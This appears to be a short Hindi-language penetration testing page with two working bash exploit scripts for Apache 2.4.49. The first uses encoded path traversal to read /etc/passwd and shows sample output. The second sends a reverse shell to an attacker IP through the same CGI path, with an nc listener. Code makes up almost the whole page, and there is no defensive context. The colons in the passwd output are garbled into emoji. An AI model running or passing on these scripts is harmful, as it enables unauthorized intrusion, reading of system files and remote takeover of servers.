
प्रवेश परीक्षण
प्रवेश परीक्षण
1.1. पथ ट्रैवर्सल (/etc/passwd फ़ाइल पढ़ना) #!/bin/bash
TARGET_IP="128.0.0.100" URL="http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
echo "[+] Apache 2.4.49 पर पथ ट्रैवर्सल का शोषण..." curl -s "$URL" | head -n 5 # /etc/passwd की पहली 5 पंक्तियाँ दिखाएँ
$ ./exploit_path_traversal.sh [+] Apache 2.4.49 पर पथ ट्रैवर्सल का शोषण... root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync
1.2. रिमोट कोड निष्पादन (रिवर्स शेल) #!/bin/bash
TARGET_IP="128.0.0.100" ATTACKER_IP="192.168.0.101" PORT="4444"
echo "[+] $ATTACKER_IP:$PORT पर रिवर्स शेल भेजा जा रहा है..."
curl -X POST
"http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
-H "Content-Type: application/x-www-form-urlencoded"
-d "echo; bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$PORT 0>&1'"
nc -lvnp 4444
./exploit_apache_rce.sh